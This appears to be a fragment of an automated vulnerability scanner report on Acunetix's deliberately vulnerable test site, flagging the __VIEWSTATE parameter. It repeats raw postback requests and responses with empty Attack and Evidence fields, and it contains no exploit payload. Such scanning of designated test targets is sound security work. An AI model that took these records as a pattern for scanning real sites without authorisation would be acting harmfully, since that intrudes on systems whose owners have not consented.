style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8289&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAA9pGIk9oIZGRkQjNK0cL4EeyyudewLAHtUJa%2FH84%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKVkOHeCwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAriKUX6NipCOPOZidRWFIxlKnG4a
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:42 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAA9pGIk9oIZGRkQjNK0cL4EeyyudewLAHtUJa/H84=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKVkOHeCwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAriKUX6NipCOPOZidRWFIxlKnG4a" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:White" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1149 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,149 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8277&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAAZUaitoIZGRkdly6qITFCqLBfRGIBSG6uh4safc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLAhr1lAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACxF%2FYVAT%2FVR9Ppi6k5x5%2FJFrs5AQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:51 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAAZUaitoIZGRkdly6qITFCqLBfRGIBSG6uh4safc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLAhr1lAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACxF/YVAT/VR9Ppi6k5x5/JFrs5AQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:White" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> 